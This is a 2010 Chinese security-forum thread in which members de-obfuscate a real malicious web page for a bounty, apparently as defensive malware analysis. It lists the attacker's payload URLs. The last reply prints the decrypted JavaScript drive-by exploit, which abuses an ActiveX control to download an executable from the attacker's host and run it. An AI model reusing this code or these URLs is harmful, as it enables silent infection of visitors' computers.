网马解密悬赏第五十六期（已结束） - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 恶意网站交流网马解密悬赏第五十六期（已结束）

	瑞星ESM助力北京石龙医院筑牢安全防线		瑞星恶意代码管理系统助金华电力提升防御能力		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		助力国家网络安全瑞星获病毒应急处理中心感谢信
	实力拉满瑞星第四十四次通过VB100测评		瑞星发布2024年六大网络安全趋势		瑞星携手中国农业大学共筑网络安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

[悬赏] 网马解密悬赏第五十六期（已结束）

本主题由大版主 networkedition 于 2010-12-16 15:47:31 执行关闭主题/取消操作

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2010-12-16 11:08 \| 只看楼主短消息资料字号：小中大 1楼网马解密悬赏第五十六期（已结束）引用: 解密地址：http://toshaa.com/b2b/ 引用: 规则：1.一次解完并附解密日志和步骤（包含swf和pdf网马），奖赏20贡献，每步奖赏5威望； 2. 如地址失效，请下载附件源代码来进行解密。 3. 严禁使用自动解密工具（shellcode自动解密工具） 4. 对于积极参与此活动会员，并多次中奖者，我们可以诚邀加入卡卡反病毒小组引用: 解密工具： Freshow（中文版） Redoce（中文版） Malzilla （汉化版）引用: 在线解析站点： http://glacierlk.cn/openlab/jm.htm http://www.cha88.cn/ 引用: 注：论坛所有会员均可参加，严禁使用md的自动解密功能引用: 恶意网址来源瑞星全功能安全软件拦截到真实有效的地址用户系统信息：Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2) 用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) networkedition 最后编辑于 2010-12-16 15:48:21
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	分享到：

09kaka 雄霸杖朝狮帖子:24047 注册: 2009-02-27 来自:	发表于： 2010-12-16 14:46 \| 短消息资料字号：小中大 2楼回复：网马解密悬赏第五十六期 Log is generated by FreShow. [wide]http://toshaa.com/b2b/ [object]http://toshaa.com/b2b/~a.hdfe [object]http://toshaa.com/b2b/h.wnmd [object]http://toshaa.com/b2b/g.msdf [object]http://toshaa.com/b2b/f.qald [object]http://toshaa.com/b2b/e.kfew [object]http://toshaa.com/b2b/d.nskf [object]http://toshaa.com/b2b/c.hald [object]http://toshaa.com/b2b/b.ofds 本帖被评分 1 次本帖被评分 1 次好好学习天天向上找个老婆生个小胖
09kaka 雄霸杖朝狮帖子:24047 注册: 2009-02-27 来自:

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2010-12-16 14:48 \| 只看楼主短消息资料字号：小中大 3楼回复 2F 09kaka 的帖子 http://toshaa.com/b2b/b.ofds 没有解出来吧。
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

09kaka 雄霸杖朝狮帖子:24047 注册: 2009-02-27 来自:	发表于： 2010-12-16 15:03 \| 短消息资料字号：小中大 4楼回复 3F networkedition 的帖子还有啊我看了几个都是MZ。。。好好学习天天向上找个老婆生个小胖
09kaka 雄霸杖朝狮帖子:24047 注册: 2009-02-27 来自:

09kaka 雄霸杖朝狮帖子:24047 注册: 2009-02-27 来自:	发表于： 2010-12-16 15:08 \| 短消息资料字号：小中大 5楼回复: 网马解密悬赏第五十六期 [复制到剪贴板] CODE: <Script Language='JavaScript'> var clsid ="clsid:"; var six = "6"; var adob = "ado"+"db.strea"; var adobs = adob + "m"; var shell = "She"+"ll.Appl"+"icatio"; var shella = shell + "n"; var z = document.createElement('object'); z.setAttribute('id','z'); z.setAttribute("clas"+"sid",clsid+"BD96C556-65A3-11D"+"0-983A-00C"+"04FC29E3"+six); try { var q = z.CreateObject("msxm"+"l2.xml"+"http",''); var s = z.CreateObject(shella,''); var t = z.CreateObject(adobs,''); var name = ".//..//mldwfe.exe"; try { t.type = 1; q.open('GET','http://toshaa.com/b2b/?lsjt',0); q.send(); t.open(); t.Write(q.responseBody); t.SaveToFile(name,2); t.Close(); } catch(e) { } try { s.ShellExecute(name); } catch(e) { } }catch(e){} </Script> 好好学习天天向上找个老婆生个小胖
09kaka 雄霸杖朝狮帖子:24047 注册: 2009-02-27 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT